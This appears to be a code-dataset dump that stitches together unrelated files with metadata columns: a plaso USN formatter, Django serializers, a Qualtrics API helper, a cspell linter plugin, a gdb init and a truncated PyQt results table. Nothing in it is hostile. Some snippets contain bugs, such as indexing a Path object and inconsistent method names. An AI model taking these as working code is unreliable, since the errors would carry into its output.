'Parent file reference: {parent_file_reference}',
'Update source: {update_source}',
'Update reason: {update_reason}']
FORMAT_STRING_SHORT_PIECES = [
'{filename}',
'{file_reference}',
'{update_reason}']
SOURCE_SHORT = 'FILE'
_USN_REASON_FLAGS = {
0x00000001: 'USN_REASON_DATA_OVERWRITE',
0x00000002: 'USN_REASON_DATA_EXTEND',
0x00000004: 'USN_REASON_DATA_TRUNCATION',
0x00000010: 'USN_REASON_NAMED_DATA_OVERWRITE',
0x00000020: 'USN_REASON_NAMED_DATA_EXTEND',
0x00000040: 'USN_REASON_NAMED_DATA_TRUNCATION',
0x00000100: 'USN_REASON_FILE_CREATE',
0x00000200: 'USN_REASON_FILE_DELETE',
0x00000400: 'USN_REASON_EA_CHANGE',
0x00000800: 'USN_REASON_SECURITY_CHANGE',
0x00001000: 'USN_REASON_RENAME_OLD_NAME',
0x00002000: 'USN_REASON_RENAME_NEW_NAME',
0x00004000: 'USN_REASON_INDEXABLE_CHANGE',
0x00008000: 'USN_REASON_BASIC_INFO_CHANGE',
0x00010000: 'USN_REASON_HARD_LINK_CHANGE',
0x00020000: 'USN_REASON_COMPRESSION_CHANGE',
0x00040000: 'USN_REASON_ENCRYPTION_CHANGE',
0x00080000: 'USN_REASON_OBJECT_ID_CHANGE',
0x00100000: 'USN_REASON_REPARSE_POINT_CHANGE',
0x00200000: 'USN_REASON_STREAM_CHANGE',
0x00400000: 'USN_REASON_TRANSACTED_CHANGE',
0x80000000: 'USN_REASON_CLOSE'}
_USN_SOURCE_FLAGS = {
0x00000001: 'USN_SOURCE_DATA_MANAGEMENT',
0x00000002: 'USN_SOURCE_AUXILIARY_DATA',
0x00000004: 'USN_SOURCE_REPLICATION_MANAGEMENT'}
def GetMessages(self, formatter_mediator, event):
"""Determines the formatted message strings for an event object.
Args:
formatter_mediator (FormatterMediator): mediates the interactions
between formatters and other components, such as storage and Windows
EventLog resources.
event (EventObject): event.
Returns:
tuple(str, str): formatted message string and short message string.
Raises:
WrongFormatter: if the event object cannot be formatted by the formatter.
"""
if self.DATA_TYPE != event.data_type:
raise errors.WrongFormatter('Unsupported data type: {0:s}.'.format(
event.data_type))
event_values = event.CopyToDict()
file_reference = event_values.get('file_reference', None)
if file_reference:
event_values['file_reference'] = '{0:d}-{1:d}'.format(
file_reference & 0xffffffffffff, file_reference >> 48)
parent_file_reference = event_values.get('parent_file_reference', None)
if parent_file_reference:
event_values['parent_file_reference'] = '{0:d}-{1:d}'.format(
parent_file_reference & 0xffffffffffff, parent_file_reference >> 48)
update_reason_flags = event_values.get('update_reason_flags', 0)
update_reasons = []
for bitmask, description in sorted(self._USN_REASON_FLAGS.items()):
if bitmask & update_reason_flags:
update_reasons.append(description)
event_values['update_reason'] = ', '.join(update_reasons)
update_source_flags = event_values.get('update_source_flags', 0)
update_sources = []
for bitmask, description in sorted(self._USN_SOURCE_FLAGS.items()):
if bitmask & update_source_flags:
update_sources.append(description)
event_values['update_source'] = ', '.join(update_sources)
return self._ConditionalFormatMessages(event_values)
manager.FormattersManager.RegisterFormatters([
FileStatEventFormatter, NTFSFileStatEventFormatter,
NTFSUSNChangeEventFormatter])
| en | 0.757601 | # -*- coding: utf-8 -*- The file system stat event formatter. The file system stat event formatter. # The numeric values are for backwards compatibility with plaso files # generated with older versions of dfvfs. # pylint: disable=unused-argument Determines the formatted message strings for an event object. Args: formatter_mediator (FormatterMediator): mediates the interactions between formatters and other components, such as storage and Windows EventLog resources. event (EventObject): event. Returns: tuple(str, str): formatted message string and short message string. Raises: WrongFormatter: if the event object cannot be formatted by the formatter. # The usage of allocated is deprecated in favor of is_allocated but # is kept here to be backwards compatible. Determines the the short and long source for an event object. Args: event (EventObject): event. Returns: tuple(str, str): short and long source string. Raises: WrongFormatter: if the event object cannot be formatted by the formatter. The NTFS file system stat event formatter. Determines the formatted message strings for an event object. Args: formatter_mediator (FormatterMediator): mediates the interactions between formatters and other components, such as storage and Windows EventLog resources. event (EventObject): event. Returns: tuple(str, str): formatted message string and short message string. Raises: WrongFormatter: if the event object cannot be formatted by the formatter. The NTFS USN change event formatter. Determines the formatted message strings for an event object. Args: formatter_mediator (FormatterMediator): mediates the interactions between formatters and other components, such as storage and Windows EventLog resources. event (EventObject): event. Returns: tuple(str, str): formatted message string and short message string. Raises: WrongFormatter: if the event object cannot be formatted by the formatter. | 2.04127 | 2 |
applications/serializers.py | junlegend/back-landing-career | 0 | 8505 | from rest_framework import serializers
from applications.models import Application
class ApplicationSerializer(serializers.Serializer):
content = serializers.JSONField()
portfolio = serializers.FileField()
class ApplicationAdminSerializer(serializers.ModelSerializer):
class Meta:
model = Application
fields = ['content', 'user', 'status', 'created_at', 'updated_at', 'recruits']
class ApplicationAdminPatchSerializer(serializers.ModelSerializer):
class Meta:
model = Application
fields = ['status'] | from rest_framework import serializers
from applications.models import Application
class ApplicationSerializer(serializers.Serializer):
content = serializers.JSONField()
portfolio = serializers.FileField()
class ApplicationAdminSerializer(serializers.ModelSerializer):
class Meta:
model = Application
fields = ['content', 'user', 'status', 'created_at', 'updated_at', 'recruits']
class ApplicationAdminPatchSerializer(serializers.ModelSerializer):
class Meta:
model = Application
fields = ['status'] | none | 1 | 1.999023 | 2 |
|
qualtrics_iat/qualtrics_tools.py | ycui1/QualtricsIAT | 0 | 8506 | from pathlib import Path
import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder
# api_token = "<KEY>"
# brand_center = "mdanderson.co1"
# data_center = "iad1"
# headers = {"x-api-token": api_token}
class QualtricsTool:
"""Data model to manage Qualtrics-related tools
Parameters:
-----------
api_token: str, the API token for the user
data_center: str, the data center for the user
brand_center: str, the brand center for the user
"""
def __init__(self, api_token=None, data_center=None, brand_center=None):
self.api_token = api_token
self.data_center = data_center
self.brand_center = brand_center
@property
def api_headers(self):
"""The default API headers"""
return {"x-api-token": self.api_token}
@property
def base_url(self):
"""The default base URL"""
return f"https://{self.data_center}.qualtrics.com"
@property
def api_base_url(self):
"""The default base API URL"""
return f"{self.base_url}/API/v3"
def upload_images_api(self,
local_image_folder,
library_id,
creating_full_url=True,
qualtrics_folder=None,
filename_pattern="*"):
"""Upload images from the local folder to the Qualtrics server
:param local_image_folder: str, Path, the local folder containing the images
:param library_id: str, Qualtrics library ID number
:param creating_full_url: bool, whether returns the IDs only or the full URLs
:param qualtrics_folder: str, the Qualtrics Graphics folder for the uploaded images
:param filename_pattern: str, the pattern using which to select the images for uploading
:return list[str], the list of image IDs or URLs
"""
upload_url = f"{self.api_base_url}/libraries/{library_id}/graphics"
image_urls = list()
for file in Path(local_image_folder).glob(filename_pattern):
file_type = Path(file)[1:]
if file_type not in ("png", "gif", "jpg", "jpeg"):
raise ValueError("Qualtrics only accepts PNG, GIF, and JPEG images.")
encoded_fields = {'file': (file.name, open(file, 'rb'), f'image/{file_type}')}
image_url_id = self._upload_image(encoded_fields, qualtrics_folder, upload_url, file, creating_full_url)
image_urls.append(image_url_id)
return image_urls
def upload_images_web(self,
image_files,
library_id,
creating_full_url,
qualtrics_folder,
image_type):
"""Upload images from the web app to the Qualtrics server
:param image_files: Bytes, the uploaded bytes data from the web app
:param library_id: str, Qualtrics library ID number
:param creating_full_url: bool, whether returns the IDs only or the full URLs
:param qualtrics_folder: str, the Qualtrics Graphics folder for the uploaded images
:param image_type: str, the image file type
:return list[str], the list of image IDs or URLs
"""
image_urls = list()
upload_url = f"{self.api_base_url}/libraries/{library_id}/graphics"
file_count_digit = len(str(len(image_files)))
for file_i, file in enumerate(image_files, start=1):
encoded_fields = {'file': (f"image{file_i:0>{file_count_digit}}.{image_type}", file, f'image/{image_type}')}
image_url_id = self._upload_image(encoded_fields, qualtrics_folder, upload_url, file, creating_full_url)
image_urls.append(image_url_id)
return image_urls
def _upload_image(self, encoded_fields, qualtrics_folder, upload_url, file, creating_full_url):
if qualtrics_folder:
encoded_fields['folder'] = qualtrics_folder
mp_encoder = MultipartEncoder(fields=encoded_fields)
post_request = requests.post(
upload_url,
data=mp_encoder,
headers={'Content-Type': mp_encoder.content_type, **self.api_headers}
)
try:
image_url_id = post_request.json()['result']['id']
except KeyError:
raise Exception(f"Failed to upload image {file.name}")
if creating_full_url:
image_url_id = f"{self.base_url}/ControlPanel/Graphic.php?IM={image_url_id}"
return image_url_id
def delete_images(self, library_id, image_url_ids):
"""Delete images from the specified library
:param library_id: str, the library ID number
:param image_url_ids: list[str], the image IDs or full URLs
:return dict, the deletion report"""
report = dict()
for image_url_id in image_url_ids:
if image_url_id.find("=") > 0:
image_url_id = image_url_id[image_url_id.index("=") + 1:]
url = f'{self.api_base_url}/libraries/{library_id}/graphics/{image_url_id}'
delete_response = requests.delete(url, headers=self.api_headers)
try:
http_status = delete_response.json()['meta']['httpStatus']
except KeyError:
raise Exception(f"Failed to delete image: {image_url_id}")
else:
report[image_url_id] = "Deleted" if http_status.startswith('200') else "Error"
return report
def create_survey(self, template_json):
"""Create the survey using the JSON template
:param template_json: str in the JSON format, the JSON file for the qsf file
:return str, the created Survey ID number
"""
upload_url = f"{self.api_base_url}/survey-definitions"
creation_response = requests.post(
upload_url,
json=template_json,
headers={**self.api_headers, "content-type": "application/json"}
)
try:
survey_id = creation_response.json()['result']['SurveyID']
except KeyError:
raise Exception("Couldn't create the survey. Please check the params.")
return survey_id
def delete_survey(self, survey_id):
"""Delete the survey
:param survey_id: str, the survey ID number
:return dict, the deletion report
"""
report = dict()
delete_url = f"{self.api_base_url}/survey-definitions/{survey_id}"
delete_response = requests.delete(delete_url, headers=self.api_headers)
try:
http_status = delete_response.json()['meta']['httpStatus']
except KeyError:
raise Exception(f"Failed to delete survey: {survey_id}")
else:
report[survey_id] = "Deleted" if http_status.startswith('200') else "Error"
return report
def export_responses(self, survey_id, file_format="csv", data_folder=None):
"""Export responses from the Qualtrics survey"""
download_url = f"{self.api_base_url}/surveys/{survey_id}/export-responses/"
download_payload = f'{{"format": "{file_format}"}}'
download_response = requests.post(
download_url,
data=download_payload,
headers={**self.api_headers, "content-type": "application/json"}
)
try:
progress_id = download_response.json()["result"]["progressId"]
file_id = self._monitor_progress(download_url, progress_id)
file_content = self._download_file(download_url, file_id)
except KeyError:
raise Exception("Can't download the responses. Please check the params.")
return file_content
def _monitor_progress(self, download_url, progress_id):
progress_status = "inProgress"
while progress_status != "complete" and progress_status != "failed":
progress_response = requests.get(download_url + progress_id, headers=self.api_headers)
progress_status = progress_response.json()["result"]["status"]
return progress_response.json()["result"]["fileId"]
def _download_file(self, download_url, file_id):
file_url = f"{download_url}/{file_id}/file"
file_response = requests.get(file_url, headers=self.api_headers, stream=True)
return file_response.content
| from pathlib import Path
import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder
# api_token = "<KEY>"
# brand_center = "mdanderson.co1"
# data_center = "iad1"
# headers = {"x-api-token": api_token}
class QualtricsTool:
"""Data model to manage Qualtrics-related tools
Parameters:
-----------
api_token: str, the API token for the user
data_center: str, the data center for the user
brand_center: str, the brand center for the user
"""
def __init__(self, api_token=None, data_center=None, brand_center=None):
self.api_token = api_token
self.data_center = data_center
self.brand_center = brand_center
@property
def api_headers(self):
"""The default API headers"""
return {"x-api-token": self.api_token}
@property
def base_url(self):
"""The default base URL"""
return f"https://{self.data_center}.qualtrics.com"
@property
def api_base_url(self):
"""The default base API URL"""
return f"{self.base_url}/API/v3"
def upload_images_api(self,
local_image_folder,
library_id,
creating_full_url=True,
qualtrics_folder=None,
filename_pattern="*"):
"""Upload images from the local folder to the Qualtrics server
:param local_image_folder: str, Path, the local folder containing the images
:param library_id: str, Qualtrics library ID number
:param creating_full_url: bool, whether returns the IDs only or the full URLs
:param qualtrics_folder: str, the Qualtrics Graphics folder for the uploaded images
:param filename_pattern: str, the pattern using which to select the images for uploading
:return list[str], the list of image IDs or URLs
"""
upload_url = f"{self.api_base_url}/libraries/{library_id}/graphics"
image_urls = list()
for file in Path(local_image_folder).glob(filename_pattern):
file_type = Path(file)[1:]
if file_type not in ("png", "gif", "jpg", "jpeg"):
raise ValueError("Qualtrics only accepts PNG, GIF, and JPEG images.")
encoded_fields = {'file': (file.name, open(file, 'rb'), f'image/{file_type}')}
image_url_id = self._upload_image(encoded_fields, qualtrics_folder, upload_url, file, creating_full_url)
image_urls.append(image_url_id)
return image_urls
def upload_images_web(self,
image_files,
library_id,
creating_full_url,
qualtrics_folder,
image_type):
"""Upload images from the web app to the Qualtrics server
:param image_files: Bytes, the uploaded bytes data from the web app
:param library_id: str, Qualtrics library ID number
:param creating_full_url: bool, whether returns the IDs only or the full URLs
:param qualtrics_folder: str, the Qualtrics Graphics folder for the uploaded images
:param image_type: str, the image file type
:return list[str], the list of image IDs or URLs
"""
image_urls = list()
upload_url = f"{self.api_base_url}/libraries/{library_id}/graphics"
file_count_digit = len(str(len(image_files)))
for file_i, file in enumerate(image_files, start=1):
encoded_fields = {'file': (f"image{file_i:0>{file_count_digit}}.{image_type}", file, f'image/{image_type}')}
image_url_id = self._upload_image(encoded_fields, qualtrics_folder, upload_url, file, creating_full_url)
image_urls.append(image_url_id)
return image_urls
def _upload_image(self, encoded_fields, qualtrics_folder, upload_url, file, creating_full_url):
if qualtrics_folder:
encoded_fields['folder'] = qualtrics_folder
mp_encoder = MultipartEncoder(fields=encoded_fields)
post_request = requests.post(
upload_url,
data=mp_encoder,
headers={'Content-Type': mp_encoder.content_type, **self.api_headers}
)
try:
image_url_id = post_request.json()['result']['id']
except KeyError:
raise Exception(f"Failed to upload image {file.name}")
if creating_full_url:
image_url_id = f"{self.base_url}/ControlPanel/Graphic.php?IM={image_url_id}"
return image_url_id
def delete_images(self, library_id, image_url_ids):
"""Delete images from the specified library
:param library_id: str, the library ID number
:param image_url_ids: list[str], the image IDs or full URLs
:return dict, the deletion report"""
report = dict()
for image_url_id in image_url_ids:
if image_url_id.find("=") > 0:
image_url_id = image_url_id[image_url_id.index("=") + 1:]
url = f'{self.api_base_url}/libraries/{library_id}/graphics/{image_url_id}'
delete_response = requests.delete(url, headers=self.api_headers)
try:
http_status = delete_response.json()['meta']['httpStatus']
except KeyError:
raise Exception(f"Failed to delete image: {image_url_id}")
else:
report[image_url_id] = "Deleted" if http_status.startswith('200') else "Error"
return report
def create_survey(self, template_json):
"""Create the survey using the JSON template
:param template_json: str in the JSON format, the JSON file for the qsf file
:return str, the created Survey ID number
"""
upload_url = f"{self.api_base_url}/survey-definitions"
creation_response = requests.post(
upload_url,
json=template_json,
headers={**self.api_headers, "content-type": "application/json"}
)
try:
survey_id = creation_response.json()['result']['SurveyID']
except KeyError:
raise Exception("Couldn't create the survey. Please check the params.")
return survey_id
def delete_survey(self, survey_id):
"""Delete the survey
:param survey_id: str, the survey ID number
:return dict, the deletion report
"""
report = dict()
delete_url = f"{self.api_base_url}/survey-definitions/{survey_id}"
delete_response = requests.delete(delete_url, headers=self.api_headers)
try:
http_status = delete_response.json()['meta']['httpStatus']
except KeyError:
raise Exception(f"Failed to delete survey: {survey_id}")
else:
report[survey_id] = "Deleted" if http_status.startswith('200') else "Error"
return report
def export_responses(self, survey_id, file_format="csv", data_folder=None):
"""Export responses from the Qualtrics survey"""
download_url = f"{self.api_base_url}/surveys/{survey_id}/export-responses/"
download_payload = f'{{"format": "{file_format}"}}'
download_response = requests.post(
download_url,
data=download_payload,
headers={**self.api_headers, "content-type": "application/json"}
)
try:
progress_id = download_response.json()["result"]["progressId"]
file_id = self._monitor_progress(download_url, progress_id)
file_content = self._download_file(download_url, file_id)
except KeyError:
raise Exception("Can't download the responses. Please check the params.")
return file_content
def _monitor_progress(self, download_url, progress_id):
progress_status = "inProgress"
while progress_status != "complete" and progress_status != "failed":
progress_response = requests.get(download_url + progress_id, headers=self.api_headers)
progress_status = progress_response.json()["result"]["status"]
return progress_response.json()["result"]["fileId"]
def _download_file(self, download_url, file_id):
file_url = f"{download_url}/{file_id}/file"
file_response = requests.get(file_url, headers=self.api_headers, stream=True)
return file_response.content
| en | 0.66529 | # api_token = "<KEY>" # brand_center = "mdanderson.co1" # data_center = "iad1" # headers = {"x-api-token": api_token} Data model to manage Qualtrics-related tools Parameters: ----------- api_token: str, the API token for the user data_center: str, the data center for the user brand_center: str, the brand center for the user The default API headers The default base URL The default base API URL Upload images from the local folder to the Qualtrics server :param local_image_folder: str, Path, the local folder containing the images :param library_id: str, Qualtrics library ID number :param creating_full_url: bool, whether returns the IDs only or the full URLs :param qualtrics_folder: str, the Qualtrics Graphics folder for the uploaded images :param filename_pattern: str, the pattern using which to select the images for uploading :return list[str], the list of image IDs or URLs Upload images from the web app to the Qualtrics server :param image_files: Bytes, the uploaded bytes data from the web app :param library_id: str, Qualtrics library ID number :param creating_full_url: bool, whether returns the IDs only or the full URLs :param qualtrics_folder: str, the Qualtrics Graphics folder for the uploaded images :param image_type: str, the image file type :return list[str], the list of image IDs or URLs Delete images from the specified library :param library_id: str, the library ID number :param image_url_ids: list[str], the image IDs or full URLs :return dict, the deletion report Create the survey using the JSON template :param template_json: str in the JSON format, the JSON file for the qsf file :return str, the created Survey ID number Delete the survey :param survey_id: str, the survey ID number :return dict, the deletion report Export responses from the Qualtrics survey | 2.925196 | 3 |
linter.py | dndrsn/SublimeLinter-contrib-cspell | 0 | 8507 | <reponame>dndrsn/SublimeLinter-contrib-cspell
from SublimeLinter.lint import Linter, STREAM_STDOUT
class CSpell(Linter):
cmd = 'cspell stdin'
defaults = {'selector': 'source'}
regex = r'^[^:]*:(?P<line>\d+):(?P<col>\d+) - (?P<message>.*)$'
error_stream = STREAM_STDOUT
| from SublimeLinter.lint import Linter, STREAM_STDOUT
class CSpell(Linter):
cmd = 'cspell stdin'
defaults = {'selector': 'source'}
regex = r'^[^:]*:(?P<line>\d+):(?P<col>\d+) - (?P<message>.*)$'
error_stream = STREAM_STDOUT | none | 1 | 2.329074 | 2 |
|
metal/gdb/__init__.py | cHemingway/test | 24 | 8508 | <reponame>cHemingway/test<filename>metal/gdb/__init__.py
from metal.gdb.metal_break import Breakpoint, MetalBreakpoint
from metal.gdb.exitcode import ExitBreakpoint
from metal.gdb.timeout import Timeout
from metal.gdb.newlib import NewlibBreakpoints
from metal.gdb.argv import ArgvBreakpoint
| from metal.gdb.metal_break import Breakpoint, MetalBreakpoint
from metal.gdb.exitcode import ExitBreakpoint
from metal.gdb.timeout import Timeout
from metal.gdb.newlib import NewlibBreakpoints
from metal.gdb.argv import ArgvBreakpoint | none | 1 | 1.145697 | 1 |
|
portfolio/gui/tabresults/righttable.py | timeerr/portfolio | 0 | 8509 | <filename>portfolio/gui/tabresults/righttable.py
#!/usr/bin/python3
from datetime import datetime
from PyQt5.QtWidgets import QTableWidgetItem, QTableWidget, QAbstractItemView, QMenu, QMessageBox
from PyQt5.QtGui import QCursor
from PyQt5.QtCore import Qt, pyqtSignal, QObject
from portfolio.db.fdbhandler import results, strategies, balances
def updatingdata(func):
"""
Decorator to flag self.updatingdata_flag whenever a function
that edits data without user intervention is being run
"""
def wrapper(self, *args, **kwargs):
self.updatingdata_flag = True
func(self, *args, **kwargs)
self.updatingdata_flag = False
return wrapper
class RightTable(QTableWidget):
"""
Table dynamically showing results
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# Custom Menu
self.setContextMenuPolicy(Qt.CustomContextMenu)
self.customContextMenuRequested.connect(self.showMenu)
# A signal that will be emited whenever a line is removed
self.lineremoved = LineRemoved()
# UI Tweaks
self.verticalHeader().hide()
self.setSortingEnabled(True)
self.setHorizontalHeaderLabels(
["id", self.tr("Date"), self.tr("Account"), self.tr("Strategy"), self.tr("Amount")])
# When edited, change the data on the database too
self.cellChanged.connect(self.changeCellOnDatabase)
# A flag to prevent changeCellOnDatabase execution when needed
self.updatingdata_flag = True
# Initialization: show all transactions
self.setData(datetime(1980, 1, 1), datetime.today(), "All", "All")
@updatingdata
def setData(self, startdate, enddate, strategy, account):
"""
Asks the database for results data within certain parameters,
then shows that data on the table
"""
# Clear table
self.clear()
self.setHorizontalHeaderLabels(
["id", self.tr("Date"), self.tr("Account"), self.tr("Strategy"), self.tr("Amount"), self.tr("Description")])
# Get desired data from db
results_to_show = results.get_results_from_query(
start_date=startdate, end_date=enddate, strategy=strategy, account=account)
# If the data is empty, we are done
if len(results_to_show) == 0:
self.setRowCount(0)
return
# Resize table
self.setRowCount(len(results_to_show))
self.setColumnCount(len(results_to_show[0]))
# Change content
for rownum, row in enumerate(results_to_show):
for colnum, data in enumerate(row):
item = QTableWidgetItem() # Item that will be inserted
if colnum == 0:
# Ids can't be editable
item.setFlags(Qt.ItemIsSelectable)
elif colnum == 1:
# Change format to display date better
data = datetime.fromtimestamp(data).strftime("%d-%m-%Y")
# Data is now formatted, we can write it on table
item.setData(0, data)
self.setItem(rownum, colnum, item)
def showMenu(self, event):
"""
Custom Menu to show when an item is right-clicked
Options:
- Remove Line: removes line from table and database
"""
menu = QMenu()
# Actions
remove_action = menu.addAction(self.tr("Remove Line"))
# Getting action selected by user
action = menu.exec_(QCursor.pos())
# Act accordingly
if action == remove_action:
self.removeSelection()
self.lineremoved.lineRemoved.emit()
@updatingdata
def removeSelection(self):
"""
Removes the entire row of every selected item,
and then does the same on the databse
"""
# Getting selected indexes, and their corresponding ids
# from the database
selected_indexes_table, selected_ids = [], []
for index in self.selectedIndexes():
index = index.row() # Row number
if index not in selected_indexes_table: # Avoid duplicates
selected_indexes_table.append(index)
selected_ids.append(int(self.item(index, 0).text()))
# Removing the rows from the table and the database
for index, id_db in zip(selected_indexes_table, selected_ids):
results.delete_result(id_db)
self.removeRow(index)
print("Removed rows with ids on db : ", selected_ids,
"\n & ids on table: ", selected_indexes_table)
def changeCellOnDatabase(self, row, column):
"""
When a Table Item is edited by the user,
we want to check if it fits the type
and edit it on the database too
"""
if self.updatingdata_flag is True:
return
# The data is being modified internally (not by the user)
# so no errors assumed
new_item = self.item(row, column)
new_item_data = new_item.text()
database_entry_id = self.item(row, 0).text()
previous_amount = results.getResultAmountById(
database_entry_id) # Useful for balance adjustments later
columnselected_name = self.horizontalHeaderItem(column).text()
# Depending on from which column the item is, we check the data
# proposed differently
# Check which part of the transaction has been edited, and accting accordingly
# -------------- id --------------------
if columnselected_name == self.tr("Id"):
# Ids can't be edited
error_mssg = QMessageBox()
error_mssg.setIcon(QMessageBox.Warning)
error_mssg.setText(self.tr("Ids can't be edited"))
error_mssg.exec_()
# -------------- Date --------------------
elif columnselected_name == self.tr("Date"):
# The new text has to be a date
try:
new_date = datetime.strptime(new_item_data, "%d-%m-%Y")
results.update_result(
database_entry_id, new_date=new_date.timestamp())
except ValueError:
error_mssg = QMessageBox()
error_mssg.setIcon(QMessageBox.Warning)
error_mssg.setText(
self.tr("Has to be a date in format dd-mm-yyyy"))
error_mssg.exec_()
# Reset date to previous one
previous_date_timestamp = results.get_result_date_by_id(
database_entry_id)
previous_date_text = datetime.fromtimestamp(
previous_date_timestamp).strftime("%d-%m-%Y")
self.updatingdata_flag = True
new_item.setData(0, previous_date_text)
self.updatingdata_flag = False
# -------------- Account --------------------
elif columnselected_name == self.tr("Account"):
# The account has to be an existing one
all_accounts = [a[0] for a in balances.get_all_accounts()]
previous_account = results.get_result_account_by_id(
database_entry_id)
if new_item_data not in all_accounts:
error_mssg = QMessageBox()
error_mssg.setIcon(QMessageBox.Warning)
error_mssg.setText(
self.tr("The account has to be an existing one. \nAdd it first manually"))
error_mssg.exec_()
# Reset strategy to previous one
self.updatingdata_flag = True
new_item.setData(0, previous_account)
self.updatingdata_flag = False
else:
# The data is good
# Change the result on the results table on the db
results.update_result(
database_entry_id, new_account=new_item_data)
# Update the balance of the two accounts involved,
# according to the result amount
balances.update_balances_with_new_result(
previous_account, - previous_amount)
balances.update_balances_with_new_result(
new_item_data, previous_amount)
# -------------- Strategy --------------------
elif columnselected_name == self.tr("Strategy"):
# The strategy has to be an existing one
previous_strategy = results.get_result_strategy_by_id(
database_entry_id)
all_strategies = [s[0] for s in strategies.get_all_strategies()]
if new_item_data not in all_strategies:
error_mssg = QMessageBox()
error_mssg.setIcon(QMessageBox.Warning)
error_mssg.setText(
self.tr("The strategy has to be an existing one. \nAdd it first manually"))
error_mssg.exec_()
# Reset strategy to previous one
self.updatingdata_flag = True
new_item.setData(0, previous_strategy)
self.updatingdata_flag = False
else:
# The data is good
# Change the result on the results table of the db
results.updateResult(
database_entry_id, newstrategy=new_item_data)
# Update the pnl of the two strategies involved,
# according to the result amount
strategies.update_strategies_with_new_result(
previous_strategy, - previous_amount)
strategies.update_strategies_with_new_result(
new_item_data, previous_amount)
# -------------- Amount --------------------
elif columnselected_name == self.tr("Amount"):
# The amount has to be an integer
try:
new_item_data = int(new_item_data)
# Change the result on the results table of the db
results.update_result(
database_entry_id, new_amount=new_item_data)
# Update the balances and strategies with the difference
# between the old and the new result
diff_betweeen_results = new_item_data - previous_amount
account_involved = results.get_result_account_by_id(
database_entry_id)
strategy_involved = results.get_result_strategy_by_id(
database_entry_id)
balances.update_balances_with_new_result(
account_involved, diff_betweeen_results)
strategies.update_strategies_with_new_result(
strategy_involved, diff_betweeen_results)
except Exception:
error_mssg = QMessageBox()
error_mssg.setIcon(QMessageBox.Warning)
error_mssg.setText(
self.tr("Has to be an integer"))
error_mssg.exec_()
# Reset to previous amount
previous_amount = results.get_result_amount_by_id(
database_entry_id)
self.updatingdata_flag = True
new_item.setData(0, previous_amount)
self.updatingdata_flag = False
# -------------- Description --------------------
elif columnselected_name == self.tr("Description"):
# A description can be any data. So no checks
results.update_result(
database_entry_id, new_description=new_item_data)
class LineRemoved(QObject):
lineRemoved = pyqtSignal()
| <filename>portfolio/gui/tabresults/righttable.py
#!/usr/bin/python3
from datetime import datetime
from PyQt5.QtWidgets import QTableWidgetItem, QTableWidget, QAbstractItemView, QMenu, QMessageBox
from PyQt5.QtGui import QCursor
from PyQt5.QtCore import Qt, pyqtSignal, QObject
from portfolio.db.fdbhandler import results, strategies, balances
def updatingdata(func):
"""
Decorator to flag self.updatingdata_flag whenever a function
that edits data without user intervention is being run
"""
def wrapper(self, *args, **kwargs):
self.updatingdata_flag = True
func(self, *args, **kwargs)
self.updatingdata_flag = False
return wrapper
class RightTable(QTableWidget):
"""
Table dynamically showing results
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# Custom Menu
self.setContextMenuPolicy(Qt.CustomContextMenu)
self.customContextMenuRequested.connect(self.showMenu)
# A signal that will be emited whenever a line is removed
self.lineremoved = LineRemoved()
# UI Tweaks
self.verticalHeader().hide()
self.setSortingEnabled(True)
self.setHorizontalHeaderLabels(
["id", self.tr("Date"), self.tr("Account"), self.tr("Strategy"), self.tr("Amount")])
# When edited, change the data on the database too
self.cellChanged.connect(self.changeCellOnDatabase)
# A flag to prevent changeCellOnDatabase execution when needed
self.updatingdata_flag = True
# Initialization: show all transactions
self.setData(datetime(1980, 1, 1), datetime.today(), "All", "All")
@updatingdata
def setData(self, startdate, enddate, strategy, account):
"""
Asks the database for results data within certain parameters,
then shows that data on the table
"""
# Clear table
self.clear()
self.setHorizontalHeaderLabels(
["id", self.tr("Date"), self.tr("Account"), self.tr("Strategy"), self.tr("Amount"), self.tr("Description")])
# Get desired data from db
results_to_show = results.get_results_from_query(
start_date=startdate, end_date=enddate, strategy=strategy, account=account)
# If the data is empty, we are done
if len(results_to_show) == 0:
self.setRowCount(0)
return
# Resize table
self.setRowCount(len(results_to_show))
self.setColumnCount(len(results_to_show[0]))
# Change content
for rownum, row in enumerate(results_to_show):
for colnum, data in enumerate(row):
item = QTableWidgetItem() # Item that will be inserted
if colnum == 0:
# Ids can't be editable
item.setFlags(Qt.ItemIsSelectable)
elif colnum == 1:
# Change format to display date better
data = datetime.fromtimestamp(data).strftime("%d-%m-%Y")
# Data is now formatted, we can write it on table
item.setData(0, data)
self.setItem(rownum, colnum, item)
def showMenu(self, event):
"""
Custom Menu to show when an item is right-clicked
Options:
- Remove Line: removes line from table and database
"""
menu = QMenu()
# Actions
remove_action = menu.addAction(self.tr("Remove Line"))
# Getting action selected by user
action = menu.exec_(QCursor.pos())
# Act accordingly
if action == remove_action:
self.removeSelection()
self.lineremoved.lineRemoved.emit()
@updatingdata
def removeSelection(self):
"""
Removes the entire row of every selected item,
and then does the same on the databse
"""
# Getting selected indexes, and their corresponding ids
# from the database
selected_indexes_table, selected_ids = [], []
for index in self.selectedIndexes():
index = index.row() # Row number
if index not in selected_indexes_table: # Avoid duplicates
selected_indexes_table.append(index)
selected_ids.append(int(self.item(index, 0).text()))
# Removing the rows from the table and the database
for index, id_db in zip(selected_indexes_table, selected_ids):
results.delete_result(id_db)
self.removeRow(index)
print("Removed rows with ids on db : ", selected_ids,
"\n & ids on table: ", selected_indexes_table)
def changeCellOnDatabase(self, row, column):
"""
When a Table Item is edited by the user,
we want to check if it fits the type
and edit it on the database too
"""
if self.updatingdata_flag is True:
return
# The data is being modified internally (not by the user)
# so no errors assumed
new_item = self.item(row, column)
new_item_data = new_item.text()
database_entry_id = self.item(row, 0).text()
previous_amount = results.getResultAmountById(
database_entry_id) # Useful for balance adjustments later
columnselected_name = self.horizontalHeaderItem(column).text()
# Depending on from which column the item is, we check the data
# proposed differently
# Check which part of the transaction has been edited, and accting accordingly
# -------------- id --------------------
if columnselected_name == self.tr("Id"):
# Ids can't be edited
error_mssg = QMessageBox()
error_mssg.setIcon(QMessageBox.Warning)
error_mssg.setText(self.tr("Ids can't be edited"))
error_mssg.exec_()
# -------------- Date --------------------
elif columnselected_name == self.tr("Date"):
# The new text has to be a date
try:
new_date = datetime.strptime(new_item_data, "%d-%m-%Y")
results.update_result(
database_entry_id, new_date=new_date.timestamp())
except ValueError:
error_mssg = QMessageBox()
error_mssg.setIcon(QMessageBox.Warning)
error_mssg.setText(
